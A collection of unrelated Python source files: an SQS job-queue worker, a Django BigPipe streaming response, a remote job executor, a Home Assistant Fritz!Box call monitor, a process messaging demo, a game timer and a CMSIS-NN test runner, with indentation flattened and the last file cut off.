if self.queue is None:
raise KeyError("Provided queue name not found")
except KeyError:
fatal_error("Given queue non-existent", "a different queue name",
self.should_shutdown)
def new_proc(self):
"""Launch a new process from the current meta message"""
try:
self.message_body = self.meta.get_body()
log_it("Gonna run "+self.message_body)
self.process = mp.Process(target = run.manage,
args = (self.message_body,))
self.process.start()
self.start_time = time.time()
except Exception as e:
running_error(e)
self.shutdown()
def proc_alive(self):
"""Is the process alive?"""
if self.process.is_alive():
return True
else:
self.process.join() # wait until process really terminates
took = int(time.time() - self.start_time)
hr, min, sec = took // 3600, took // 60 % 60, took % 60
log_it("Took %i:%i:%i to run %s"%(hr, min, sec, self.message_body))
return False
def new_meta(self):
"""Read the next meta message"""
self.meta = self.queue.read()
def delete_meta(self):
"""Delete the current meta message"""
self.queue.delete_message(self.meta)
def shutdown(self):
"""Turn off instance"""
if self.should_shutdown:
log_it("Going no further, shutting down now")
halt_system()
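# Usage sketch (assumption, not part of the original module): a single
# eater can be run directly, e.g. queue_eater('job_queue', shutdown=False).
# It blocks until the queue is empty, running one run.manage process at a
# time and deleting each message only after a clean (exitcode 0) run.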
## Many munching mouths
def multi_eaters(sqs_queue_name, num=None, id=None, secret=None, shutdown=True):
"""Launch a number of queue eaters"""
if num is None:
num = mp.cpu_count()
queue_eater_args = (sqs_queue_name, id, secret, shutdown)
eaters = [mp.Process(target=queue_eater, args = queue_eater_args) \
for i in range(num)]
[e.start() for e in eaters]
time.sleep(0.5)
while not all([not e.is_alive() for e in eaters]):
time.sleep(0.5)
[e.join() for e in eaters]
if shutdown is True:
halt_system()
## Our main man
def main(argv=None):
## Get our args from the command line if not passed directly
if argv is None:
argv = sys.argv[1:]
## Parse arguments into values
print(argv)
parser = optparse.OptionParser("Investigate options and re-call")
parser.add_option('-q', '--queue', dest="queue_name",
default="job_queue", type='string',
help='set the queue to look for commands in')
parser.add_option('-i', '--id', dest="id",
default=None, type='string',
help='what aws id credential to use')
parser.add_option('-s', '--secret', dest="secret",
default=None, type='string',
help='what aws secret key to use')
parser.add_option('-m', '--multiprocessing', action="store_const",
dest="proc_num", default=1, const=mp.cpu_count(),
help='run as many copies as there are cores [False]')
parser.add_option('--halt', action="store_true",
dest="the_end_of_the_end", default=False,
help='shutdown computer on completion or error [False]')
(options, args) = parser.parse_args(argv)
multi_eaters(options.queue_name, options.proc_num, options.id,
options.secret, options.the_end_of_the_end)
return 0 #Successful termination
if __name__ == "__main__":
sys.exit(main())
|
bigpipe_response.py
|
import enum
import json
import logging
import queue
import sys
import threading
import traceback
from django.http import StreamingHttpResponse
from django.http.response import HttpResponseBase
from bigpipe_response.bigpipe import Bigpipe
from bigpipe_response.bigpipe_render_options import BigpipeRenderOptions
from bigpipe_response.content_result import ContentResult
from bigpipe_response.debugger.bigpipe_debugger import BigpipeDebugger
class BigpipeResponse(StreamingHttpResponse):
class RenderType(enum.Enum):
TEMPLATE = enum.auto()
JAVASCRIPT = enum.auto()
JAVASCRIPT_RENDER = enum.auto()
def __init__(self, request,
render_type=RenderType.TEMPLATE,
render_source=None,
render_context={},
pagelets=[],
js_dependencies=[],
scss_dependencies=[],
i18n_dependencies=[],
render_options: BigpipeRenderOptions = None):
super().__init__(streaming_content=self.__stream_content())
if request is None:
raise ValueError('request cannot be None')
self.logger = logging.getLogger(self.__class__.__name__)
self.request = request
self.pagelets = pagelets
self.processed_js_files, self.processed_css_files = [], []
from bigpipe_response.content_loader import ContentLoader
self.content_loader = ContentLoader(render_type, render_source, render_context, render_options, js_dependencies, scss_dependencies, i18n_dependencies)
def __stream_content(self):
last_pagelet_target = None
try:
content_result = self.content_loader.load_content('body', [], [])
self.processed_js_files = self.processed_js_files + content_result.js_effected_files
self.processed_css_files = self.processed_css_files + content_result.css_effected_files
for entry_content in self.__build_bigpipe_data_main_yield(content_result):
yield entry_content
dependencies = {}
que = queue.Queue()
pagelet_count = len(self.pagelets)
for pagelet in self.pagelets:
last_pagelet_target = pagelet.target
if pagelet.depends_on:
dependencies[pagelet.target] = pagelet.depends_on
threading.Thread(target=self.__process_paglet, args=(pagelet, que), daemon=True).start()
# Validate dependencies
self.__validate_dependencies(dependencies)
yield_paglets = []
yield_later = {}
for _ in range(pagelet_count):
content_result_pagelet = que.get()
if not isinstance(content_result_pagelet, ContentResult):
content_result_pagelet_type = type(content_result_pagelet) if content_result_pagelet else None
self.logger.error('expected `ContentResult` got `{}` return for pagelet path `{}`'.format(content_result_pagelet_type, self.request.path))
if isinstance(content_result_pagelet, HttpResponseBase):
raise ValueError(f'pagelet with url `{content_result_pagelet.url}` Expected `ContentResult`, got `HttpResponseBase` instead')
raise content_result_pagelet
bigpipe_paglet_data = content_result_pagelet.to_dict(pagelet.target)
# Handle depends_on
# When depends_on flag is set, the result will be cached and pushed only after the dependency is loaded
target = bigpipe_paglet_data['target']
if target in dependencies:
dependent_target = dependencies.get(target)
if dependent_target not in yield_paglets:
yield_later.setdefault(dependent_target, []).append(bigpipe_paglet_data)
continue
yield_paglets.append(target)
yield self._render_paglet_content(bigpipe_paglet_data)
if target in yield_later:
for yield_pagelet_response in yield_later.get(target):
yield self._render_paglet_content(yield_pagelet_response)
del yield_later[target]
for target, pending in list(yield_later.items()):
    for bigpipe_paglet_data in pending:
        yield self._render_paglet_content(bigpipe_paglet_data)
    del yield_later[target]
except BaseException as ex:
self.logger.error("Error handling bigpipe response", exc_info=sys.exc_info())
if not Bigpipe.get().config.is_production_mode: # DEVELOPMENT MODE
error_target = 'Error in request source [{}]{}'.format(self.content_loader.render_source, ', on pagelet target element [{}]'.format(last_pagelet_target) if last_pagelet_target else '')
content, js, css = BigpipeDebugger.get_exception_content(error_target, (str(ex.errors) if hasattr(ex, 'errors') else str(ex)), traceback.format_exc())
i18n = {}
content_result_error = ContentResult(content, js, css, i18n, [], [], [], [])
if last_pagelet_target:
yield self._render_paglet_content(content_result_error.to_dict(last_pagelet_target))
else:
for entry_content in self.__build_bigpipe_data_main_yield(content_result_error):
yield entry_content
else:
raise ex
yield '</body></html>\n'
def __process_paglet(self, pagelet, result_queue):
try:
pagelet_response = pagelet.render()
if isinstance(pagelet_response, BigpipeResponse):
# 1. execute, and get the pagelet content.
content_result = pagelet_response.content_loader.load_content(pagelet.target, self.processed_js_files, self.processed_css_files)
# 2. build and collect ignore list of loaded. since the main request initiated.
self.processed_js_files = self.processed_js_files + content_result.js_effected_files
self.processed_css_files = self.processed_css_files + content_result.css_effected_files
# 3. build pagelet as bigpipe data
result_queue.put(content_result)
else:
logging.error('Pagelet response for target `{}` is not of type `BigpipeResponse`, will return response content. {}'.format(pagelet.target, pagelet_response))
result_queue.put(pagelet_response)
except BaseException as ex:
logging.exception(ex)
result_queue.put(ex)
#
# Yield content
#
def __build_bigpipe_data_main_yield(self, content_result: ContentResult):
if content_result.content:
yield content_result.content
if content_result.i18n:
yield '\n<script>\n\trenderI18n({})\n</script>\n'.format(json.dumps(content_result.i18n))
if content_result.css:
yield '\n<style>\n\t{}\n</style>\n'.format(content_result.css)
if content_result.js:
yield '\n<script>\n\t{}\n</script>\n'.format(content_result.js)
def _render_paglet_content(self, pagelet_content):
return """
<script id='{}'>
renderPagelet({})
</script>
""".format('script_{}'.format(pagelet_content['target']), json.dumps(pagelet_content))
def __validate_dependencies(self, dependencies: dict):
for key, value in dependencies.items():
if value in dependencies:
raise ValueError('Dependencies lock. dependency `{}` already defined'.format(value))
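# Illustration of the check above (hypothetical targets): with
# {'sidebar': 'header', 'header': 'footer'}, 'header' appears both as a
# dependent and as a dependency, so __validate_dependencies raises
# ValueError; a flat mapping like {'sidebar': 'header'} passes. Chains
# and cycles are both rejected.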
|
execute.py
|
import contextlib
import json
import mimetypes
import os
import subprocess
import sys
import threading
import time
import traceback
from binaryornot.check import is_binary
from collections import deque
from datetime import datetime, timedelta
from pathlib import Path
from textwrap import dedent
from .server import Server, file_hash, timestamp
class Job:
HEARTBEAT_INTERVAL = timedelta(seconds=60)
def __init__(self, host: str, job_id: int):
self.job_id = job_id
self.server = Server(host)
self.root = Path(str(job_id)).resolve()
self.root.mkdir(parents=True, exist_ok=True)
self.log_file = self.root / f'{self.job_id}.log'
self.done = threading.Event()
self.beat = threading.Thread(target=self.heartbeat)
self.beat.start()
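# The heartbeat thread posts the last 100 log lines to the server every
# HEARTBEAT_INTERVAL until upload() sets self.done.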
def heartbeat(self):
def send():
try:
if self.log_file.is_file():
tail = ''.join(deque(open(self.log_file), 100))
else:
tail = ''
self.server.post(f'/executor_api/jobs/{self.job_id}/heartbeat',
json=dict(log_tail=tail))
except Exception:
print(traceback.format_exc())
chkpt = None
while not self.done.is_set():
time.sleep(0.5)
if chkpt is None or datetime.utcnow() >= chkpt:
send()
chkpt = datetime.utcnow() + self.HEARTBEAT_INTERVAL
def download(self):
with open(self.log_file, 'at', buffering=1) as log_file:
with contextlib.redirect_stdout(log_file):
self.job = self.server.get(f'/executor_api/jobs/{self.job_id}')
job_files = self.server.get(f'/executor_api/jobs/{self.job_id}/files')
job_packages = self.server.get(f'/executor_api/jobs/{self.job_id}/packages')
(self.root / 'in').mkdir(parents=True, exist_ok=True)
(self.root / 'in' / 'params.json').write_text(
json.dumps(
{m['name'] : m['value'] for m in self.job['fields']},
ensure_ascii=False))
files = {self.root / f['name']: (self.root, f)
for f in job_files if Path(f['name']).parts[0] != 'out'}
for package in job_packages:
path = self.root / 'in' / str(package['id'])
path.mkdir(parents=True, exist_ok=True)
(path / 'label').write_text(package['label'])
(path / 'fields.json').write_text(
json.dumps(
{m['name'] : m['value'] for m in package['fields']},
ensure_ascii=False))
for p, f in files.values():
self.server.download(f, folder=p)
print(f'[{timestamp()}] Job inputs downloaded')
def execute(self):
env = os.environ.copy()
env.pop('RNDFLOW_REFRESH_TOKEN', None)  # keep the refresh token out of the job's environment
base_url = os.environ.get('JUPYTER_BASE_URL')
if self.job.get('is_interactive') and base_url:
script = f"$jupyter_interactive --allow-root --no-browser --ip='*' --NotebookApp.base_url={base_url} --NotebookApp.token=''"
else:
script = self.job['node']['script'] or "echo 'Empty script: nothing to do :('\nexit 1"
script_wrapper = dedent(f"""\
if ! command -v ts; then
echo "ts is not installed in the container!" > {self.job_id}.log
exit 1
fi
if ! command -v tee; then
echo "tee is not installed in the container!" > {self.job_id}.log
exit 1
fi
if command -v jupyter-lab; then
jupyter_interactive=jupyter-lab
else
jupyter_interactive=jupyter-notebook
fi
(
{script}
) 2>&1 | ts "[%Y-%m-%d %H:%M:%S]" | tee -a {self.job_id}.log
rc=${{PIPESTATUS[0]}}
exit $rc
""")
p = subprocess.run(script_wrapper, cwd=self.root, shell=True, executable="/bin/bash", env=env)
self.status = p.returncode
def upload(self):
with open(self.log_file, 'at', buffering=1) as log_file:
with contextlib.redirect_stdout(log_file):
print(f'[{timestamp()}] Uploading job output to server...')
exclude_dirs = ('in', '__pycache__', '.ipynb_checkpoints')
def enumerate_files():
for dir, dirs, files in os.walk(self.root):
path = Path(dir)
dirs[:] = [d for d in dirs
if (path / d).relative_to(self.root).parts[0] not in exclude_dirs]
for f in files:
yield path / f
def upload_files(paths):
p2h = {Path(path) : file_hash(path) for path in paths}
h2p = {h : p for p,h in p2h.items()}
links = self.server.post(f'/executor_api/jobs/{self.job_id}/upload_objects',
json={ 'objects': list(h2p.keys()) })
for item in links:
path = h2p[item['object_id']]
link = item['link']
binary = is_binary(str(path))
type,_ = mimetypes.guess_type(str(path))
if type is None:
type = 'application/x-binary' if binary else 'text/plain'
if link is not None:
with open(path, 'rb') as f:
self.server.raw_session.put(link, data=f, headers={
'Content-Type': type,
'Content-Length': str(path.stat().st_size)
}).raise_for_status()
files = []
for path,h in p2h.items():
binary = is_binary(str(path))
type,_ = mimetypes.guess_type(str(path))
if type is None:
type = 'application/x-binary' if binary else 'text/plain'
files.append(dict(
name = str(path.relative_to(self.root)),
type = type,
content_hash = h,
is_executable = os.access(path, os.X_OK),
is_binary = binary,
size = path.stat().st_size
))
return files
self.done.set()
self.beat.join()
self.server.put(f'/executor_api/jobs/{self.job_id}', json={
'status': str(self.status),
'files': upload_files(enumerate_files())
})
def __enter__(self):
self.download()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.upload()
#---------------------------------------------------------------------------
def main():
import argparse
from getpass import getpass
parser = argparse.ArgumentParser()
parser.add_argument('--host', dest='host', required=True)
parser.add_argument('--job', dest='job', required=True, type=int)
args = parser.parse_args()
if 'RNDFLOW_REFRESH_TOKEN' not in os.environ:
raise Exception('Access token not found in environment')
with Job(args.host, args.job) as job:
job.execute()
|
fritzbox_callmonitor.py
|
"""
A sensor to monitor incoming and outgoing phone calls on a Fritz!Box router.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.fritzbox_callmonitor/
"""
import logging
import socket
import threading
import datetime
import time
import re
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (CONF_HOST, CONF_PORT, CONF_NAME,
CONF_PASSWORD, CONF_USERNAME,
EVENT_HOMEASSISTANT_STOP)
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
from homeassistant.util import Throttle
REQUIREMENTS = ['fritzconnection==0.6.3']
_LOGGER = logging.getLogger(__name__)
CONF_PHONEBOOK = 'phonebook'
CONF_PREFIXES = 'prefixes'
DEFAULT_HOST = '169.254.1.1' # IP valid for all Fritz!Box routers
DEFAULT_NAME = 'Phone'
DEFAULT_PORT = 1012
INTERVAL_RECONNECT = 60
VALUE_CALL = 'dialing'
VALUE_CONNECT = 'talking'
VALUE_DEFAULT = 'idle'
VALUE_DISCONNECT = 'idle'
VALUE_RING = 'ringing'
# Return cached results if phonebook was downloaded less than this time ago.
MIN_TIME_PHONEBOOK_UPDATE = datetime.timedelta(hours=6)
SCAN_INTERVAL = datetime.timedelta(hours=3)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_PASSWORD, default='admin'): cv.string,
vol.Optional(CONF_USERNAME, default=''): cv.string,
vol.Optional(CONF_PHONEBOOK, default=0): cv.positive_int,
vol.Optional(CONF_PREFIXES, default=[]):
vol.All(cv.ensure_list, [cv.string])
})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up Fritz!Box call monitor sensor platform."""
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
port = config.get(CONF_PORT)
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
phonebook_id = config.get(CONF_PHONEBOOK)
prefixes = config.get(CONF_PREFIXES)
try:
phonebook = FritzBoxPhonebook(
host=host, port=port, username=username, password=password,
phonebook_id=phonebook_id, prefixes=prefixes)
# pylint: disable=bare-except
except:
phonebook = None
_LOGGER.warning("Phonebook with ID %s not found on Fritz!Box",
phonebook_id)
sensor = FritzBoxCallSensor(name=name, phonebook=phonebook)
add_devices([sensor])
monitor = FritzBoxCallMonitor(host=host, port=port, sensor=sensor)
monitor.connect()
def _stop_listener(_event):
monitor.stopped.set()
hass.bus.listen_once(
EVENT_HOMEASSISTANT_STOP,
_stop_listener
)
if monitor.sock is None:
return False
else:
return True
class FritzBoxCallSensor(Entity):
"""Implementation of a Fritz!Box call monitor."""
def __init__(self, name, phonebook):
"""Initialize the sensor."""
self._state = VALUE_DEFAULT
self._attributes = {}
self._name = name
self.phonebook = phonebook
def set_state(self, state):
"""Set the state."""
self._state = state
def set_attributes(self, attributes):
"""Set the state attributes."""
self._attributes = attributes
@property
def should_poll(self):
"""Only poll to update phonebook, if defined."""
if self.phonebook is None:
return False
else:
return True
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def device_state_attributes(self):
"""Return the state attributes."""
return self._attributes
def number_to_name(self, number):
"""Return a name for a given phone number."""
if self.phonebook is None:
return 'unknown'
else:
return self.phonebook.get_name(number)
def update(self):
"""Update the phonebook if it is defined."""
if self.phonebook is not None:
self.phonebook.update_phonebook()
class FritzBoxCallMonitor(object):
"""Event listener to monitor calls on the Fritz!Box."""
def __init__(self, host, port, sensor):
"""Initialize Fritz!Box monitor instance."""
self.host = host
self.port = port
self.sock = None
self._sensor = sensor
self.stopped = threading.Event()
def connect(self):
"""Connect to the Fritz!Box."""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(10)
try:
self.sock.connect((self.host, self.port))
threading.Thread(target=self._listen).start()
except socket.error as err:
self.sock = None
_LOGGER.error("Cannot connect to %s on port %s: %s",
self.host, self.port, err)
def _listen(self):
"""Listen to incoming or outgoing calls."""
while not self.stopped.is_set():
try:
response = self.sock.recv(2048)
except socket.timeout:
# if no response after 10 seconds, just recv again
continue
response = str(response, "utf-8")
if not response:
# if the response is empty, the connection has been lost.
# try to reconnect
self.sock = None
while self.sock is None:
self.connect()
time.sleep(INTERVAL_RECONNECT)
else:
line = response.split("\n", 1)[0]
self._parse(line)
time.sleep(1)
return
def _parse(self, line):
"""Parse the call information and set the sensor states."""
line = line.split(";")
df_in = "%d.%m.%y %H:%M:%S"
df_out = "%Y-%m-%dT%H:%M:%S"
isotime = datetime.datetime.strptime(line[0], df_in).strftime(df_out)
if line[1] == "RING":
self._sensor.set_state(VALUE_RING)
att = {"type": "incoming",
"from": line[3],
"to": line[4],
"device": line[5],
"initiated": isotime}
att["from_name"] = self._sensor.number_to_name(att["from"])
self._sensor.set_attributes(att)
elif line[1] == "CALL":
self._sensor.set_state(VALUE_CALL)
att = {"type": "outgoing",
"from": line[4],
"to": line[5],
"device": line[6],
"initiated": isotime}
att["to_name"] = self._sensor.number_to_name(att["to"])
self._sensor.set_attributes(att)
elif line[1] == "CONNECT":
self._sensor.set_state(VALUE_CONNECT)
att = {"with": line[4], "device": [3], "accepted": isotime}
att["with_name"] = self._sensor.number_to_name(att["with"])
self._sensor.set_attributes(att)
elif line[1] == "DISCONNECT":
self._sensor.set_state(VALUE_DISCONNECT)
att = {"duration": line[3], "closed": isotime}
self._sensor.set_attributes(att)
self._sensor.schedule_update_ha_state()
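# Call-monitor lines are semicolon-separated; shapes assumed from the
# indexing above (numbers are hypothetical):
#   17.01.17 20:01:02;RING;0;0123456789;987654321;SIP0;
#   17.01.17 20:03:15;CALL;1;10;987654321;0123456789;SIP1;
#   17.01.17 20:03:18;CONNECT;1;10;0123456789;
#   17.01.17 20:05:30;DISCONNECT;1;120;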
class FritzBoxPhonebook(object):
"""This connects to a FritzBox router and downloads its phone book."""
def __init__(self, host, port, username, password,
phonebook_id=0, prefixes=None):
"""Initialize the class."""
self.host = host
self.username = username
self.password = password
self.port = port
self.phonebook_id = phonebook_id
self.phonebook_dict = None
self.number_dict = None
self.prefixes = prefixes or []
# pylint: disable=import-error
import fritzconnection as fc
# Establish a connection to the FRITZ!Box.
self.fph = fc.FritzPhonebook(
address=self.host, user=self.username, password=self.password)
if self.phonebook_id not in self.fph.list_phonebooks:
raise ValueError("Phonebook with this ID not found.")
self.update_phonebook()
@Throttle(MIN_TIME_PHONEBOOK_UPDATE)
def update_phonebook(self):
"""Update the phone book dictionary."""
self.phonebook_dict = self.fph.get_all_names(self.phonebook_id)
self.number_dict = {re.sub(r'[^\d\+]', '', nr): name
for name, nrs in self.phonebook_dict.items()
for nr in nrs}
_LOGGER.info("Fritz!Box phone book successfully updated")
def get_name(self, number):
"""Return a name for a given phone number."""
number = re.sub(r'[^\d\+]', '', str(number))
if self.number_dict is None:
return 'unknown'
try:
return self.number_dict[number]
except KeyError:
pass
if self.prefixes:
for prefix in self.prefixes:
try:
return self.number_dict[prefix + number]
except KeyError:
pass
try:
return self.number_dict[prefix + number.lstrip('0')]
except KeyError:
pass
return 'unknown'
|
main.py
|
from process import CustomProcess
from multiprocessing import Process
import random
import time
# Create the processes
process1 = CustomProcess('Process 1')
process2 = CustomProcess('Process 2')
process3 = CustomProcess('Process 3')
processes = [process1, process2, process3]
if __name__ == '__main__':
print('Processes are starting ...')
print('\n')
# Activate the processes
P1 = Process(target=process1.listen)
P1.start()
P2 = Process(target=process2.listen)
P2.start()
P3 = Process(target=process3.listen)
P3.start()
# Give the processes some time to finish starting
time.sleep(2.5)
print('\n')
# Generate 30 events, each triggering a send and a receive
for e in range(30):
random_sender = random.choice(processes)
random_receiver = random.choice(processes)
random_sender.send_message(
random_receiver, {"name": f"Event {e}", "clock": random_sender.clock})
time.sleep(0.5)
# When finished, terminate the processes
P1.terminate()
P2.terminate()
P3.terminate()
|
mufaintervals.py
|
import time, threading
import math
import datetime
import mufadb as db
import mufabattle as mb
import mufagenerator as mg
StartTime=time.time()
def hourly_content_generation():
mg.generate_random_dungeons()
mg.dungeon_monsters_generate()
mg.global_monsters_generate()
def action() :
print('action ! -> time : {:.1f}s'.format(time.time()-StartTime))
def solve_conditions(hourly= False, tworly = False):
battlers = db.Battler.objects.no_dereference()
for b in battlers:
if isinstance(b, db.Player):
for pCharac in b.characters_list:
to_remove = []
for con in pCharac.conditions:
if con.duration == -1:
continue
else :
end_time = con.date_added + datetime.timedelta(hours =con.duration)
if (datetime.datetime.now() >= end_time):
to_remove.append(con)
for i in to_remove:
pCharac.conditions.remove(i)
if hourly:
if mb.has_condition(pCharac,"CURSED") or mb.has_condition(pCharac,"DEAD") or mb.has_condition(pCharac, "BLEEDING"):
pass
else:
pCharac.current_health = min(pCharac.vitality*10, math.ceil(pCharac.current_health+ (pCharac.vitality*0.1)))
pCharac.actions_left = pCharac.max_actions
if tworly:
pCharac.current_sanity = min(pCharac.willpower*10, math.ceil(pCharac.current_sanity+ (pCharac.willpower*0.1)))
b.updateCharacterByName(pCharac)
b.save()
elif isinstance (b, db.Monster):
pCharac = b.getCharacter()
to_remove = []
for con in pCharac.conditions:
if con.duration == -1:
continue
else :
end_time = con.date_added + datetime.timedelta(hours =con.duration)
if (datetime.datetime.now() >= end_time):
to_remove.append(con)
for i in to_remove:
pCharac.conditions.remove(i)
if hourly:
if mb.has_condition(pCharac,"CURSED") or mb.has_condition(pCharac,"DEAD") or mb.has_condition(pCharac, "BLEEDING"):
pass
else:
pCharac.current_health = min(pCharac.vitality*10, math.ceil(pCharac.current_health+ (pCharac.vitality*0.1)))
pCharac.actions_left = pCharac.max_actions
if tworly:
pCharac.current_sanity = min(pCharac.willpower*10, math.ceil(pCharac.current_sanity+ (pCharac.willpower*0.1)))
b.character_stats = pCharac
b.save()
log_message = datetime.datetime.now().ctime() + " : Completed Interval Update"
if hourly:
hourly_content_generation()
log_message += " | hourly == TRUE"
if tworly:
hourly_content_generation()
log_message += " | tworly == TRUE"
print(log_message)
class setInterval :
def __init__(self,interval,action) :
self.interval=interval
self.action=action
self.stopEvent=threading.Event()
self.seconds_passed = datetime.datetime.now().minute*60
        if datetime.datetime.now().hour % 2 != 0:
            # odd hour: start halfway through the two-hour cycle
            self.seconds_passed += 3600
thread=threading.Thread(target=self.__setInterval)
thread.start()
def __setInterval(self) :
nextTime=time.time()+self.interval
while not self.stopEvent.wait(nextTime-time.time()) :
self.seconds_passed = (self.seconds_passed+self.interval)%7200
if self.seconds_passed == 3600:
nextTime+=self.interval
self.action(True,False)
elif self.seconds_passed == 0:
nextTime+=self.interval
self.action(False,True)
else:
nextTime+=self.interval
self.action(False,False)
def cancel(self) :
self.stopEvent.set()
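# Scheduling note: seconds_passed is seeded from the wall clock in __init__, so
# within each 7200 s cycle the action fires with hourly=True at the 3600 s mark
# and with tworly=True at the 0 s mark, i.e. on alternating real hours.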
def update():
inter = setInterval(30,solve_conditions)
# start solve_conditions every 30 s
#inter=setInterval(30,solve_conditions)
#print('just after setInterval -> time : {:.1f}s'.format(time.time()-StartTime))
# will stop interval in 5s
#t=threading.Timer(5,inter.cancel)
#t.start()
|
unittest_targets.py
|
#!/usr/bin/env python3
#
# Copyright (C) 2010-2020 Arm Limited or its affiliates. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the License); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import re
import sys
import json
import copy
import glob
import time
import queue
import shutil
import serial
import argparse
import threading
import subprocess
from os import path
from termcolor import colored
OUTPUT = "Output/"
BASE_PATH = "../../"
CMSIS_PATH = "../../../../../"
UNITY_PATH = "../Unity/"
UNITY_BASE = BASE_PATH + UNITY_PATH
UNITY_SRC = UNITY_BASE + "src/"
CMSIS_FLAGS = " -DARM_MATH_DSP -DARM_MATH_LOOPUNROLL"
def parse_args():
parser = argparse.ArgumentParser(description="Run CMSIS-NN unit tests.",
epilog="Runs on all connected HW supported by Mbed.")
parser.add_argument('--testdir', type=str, default='TESTRUN', help="prefix of output dir name")
parser.add_argument('-s', '--specific-test', type=str, default=None, help="Run a specific test, e.g."
" -s TestCases/test_arm_avgpool_s8 (also this form will work: -s test_arm_avgpool_s8)."
" So basically the different options can be listed with:"
" ls -d TestCases/test_* -1")
parser.add_argument('-c', '--compiler', type=str, default='GCC_ARM', choices=['GCC_ARM', 'ARMC6'])
args = parser.parse_args()
return args
def error_handler(code, text=None):
print("Error: {}".format(text))
sys.exit(code)
def detect_targets(targets):
process = subprocess.Popen(['mbedls'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
print(process.stdout.readline().strip())
while True:
line = process.stdout.readline()
print(line.strip())
if not line:
break
if re.search(r"^\| ", line):
words = (line.split('| '))
target = {"model": words[1].strip(),
"name": words[2].strip()[:-1].replace('[', '_'),
"port": words[4].strip(),
"tid": words[5].strip()} # Target id can be used to filter out targets
targets.append(target)
    return_code = process.wait()  # poll() can return None before the process exits
    if return_code != 0:
        error_handler(return_code, 'RETURN CODE {}'.format(process.stderr.read()))
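# Illustrative `mbedls` table row the parser above expects (column layout
# inferred from the indexing; all values made up):
# | K64F | K64F[0] | /media/usb0 | /dev/ttyACM0 | 0240000034544e45001a00 | 0244 |
# words[1] -> model, words[2] -> name, words[4] -> port, words[5] -> target id.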
def run_command(command, error_msg=None, die=True):
# TODO handle error:
# cp: error writing '/media/mannil01/NODE_F411RE/TESTRUN_NUCLEO_F411RE_GCC_ARM.bin': No space left on device
# https://os.mbed.com/questions/59636/STM-Nucleo-No-space-left-on-device-when-/
# print(command)
command_list = command.split(' ')
process = subprocess.run(command_list)
if die and process.returncode != 0:
error_handler(process.returncode, error_msg)
return process.returncode
def detect_architecture(target_name, target_json):
arch = None
try:
with open(target_json, "r") as read_file:
data = json.load(read_file)
if data[target_name]['core']:
arch = data[target_name]['core'][:9]
if data[target_name]['core'][:8] == 'Cortex-M':
return arch
error_handler(668, 'Unsupported target: {} with architecture: {}'.format(
target_name, arch))
except Exception as e:
error_handler(667, e)
return arch
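# targets.json is assumed to contain entries shaped roughly like
#   "NUCLEO_F411RE": {"core": "Cortex-M4F", ...}
# so the [:9] slice above yields e.g. "Cortex-M4".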
def test_target(target, args, main_test):
result = 3
compiler = args.compiler
target_name = target['name']
target_model = target['model']
    cmsis_flags = ''  # empty default so the string concatenation below never sees None
unittestframework = 'UNITY_UNITTEST'
dir_name = OUTPUT + args.testdir + '_' + unittestframework + '_' + target_name + '_' + compiler
os.makedirs(dir_name, exist_ok=True)
start_dir = os.getcwd()
os.chdir(dir_name)
try:
target_json = 'mbed-os/targets/targets.json'
if not path.exists("mbed-os.lib"):
print("Initializing mbed in {}".format(os.getcwd()))
run_command('mbed new .')
shutil.copyfile(BASE_PATH + 'Profiles/mbed_app.json', 'mbed_app.json')
arch = detect_architecture(target_model, target_json)
if arch == 'Cortex-M4' or arch == 'Cortex-M7':
cmsis_flags = CMSIS_FLAGS
print("----------------------------------------------------------------")
print("Running {} on {} target: {} with compiler: {} and cmsis flags: {} in directory: {} test: {}\n".format(
unittestframework, arch, target_name, compiler, cmsis_flags, os.getcwd(), main_test))
die = False
flash_error_msg = 'failed to flash'
mbed_command = "compile"
test = ''
additional_options = ' --source ' + BASE_PATH + main_test + \
' --source ' + UNITY_SRC + \
' --profile ' + BASE_PATH + 'Profiles/release.json' + \
' -f'
result = run_command("mbed {} -v -m ".format(mbed_command) + target_model + ' -t ' + compiler +
test +
' --source .'
' --source ' + BASE_PATH + 'TestCases/Utils/'
' --source ' + CMSIS_PATH + 'NN/Include/'
' --source ' + CMSIS_PATH + 'DSP/Include/'
' --source ' + CMSIS_PATH + 'Core/Include/'
' --source ' + CMSIS_PATH + 'NN/Source/ConvolutionFunctions/'
' --source ' + CMSIS_PATH + 'NN/Source/PoolingFunctions/'
' --source ' + CMSIS_PATH + 'NN/Source/NNSupportFunctions/'
' --source ' + CMSIS_PATH + 'NN/Source/FullyConnectedFunctions/'
+ cmsis_flags +
additional_options,
flash_error_msg, die=die)
except Exception as e:
error_handler(666, e)
os.chdir(start_dir)
return result
def read_serial_port(ser, inputQueue, stop):
while True:
if stop():
break
line = ser.readline()
inputQueue.put(line.decode('latin-1').strip())
def test_target_with_unity(target, args, main_test):
port = target['port']
stop_thread = False
baudrate = 9600
timeout = 30
inputQueue = queue.Queue()
tests = copy.deepcopy(target["tests"])
try:
ser = serial.Serial(port, baudrate, timeout=timeout)
except Exception as e:
error_handler(669, "serial exception: {}".format(e))
# Clear read buffer
time.sleep(0.1) # Workaround in response to: open() returns before port is ready
ser.reset_input_buffer()
serial_thread = threading.Thread(target=read_serial_port, args=(ser, inputQueue, lambda: stop_thread), daemon=True)
serial_thread.start()
test_target(target, args, main_test)
start_time = time.time()
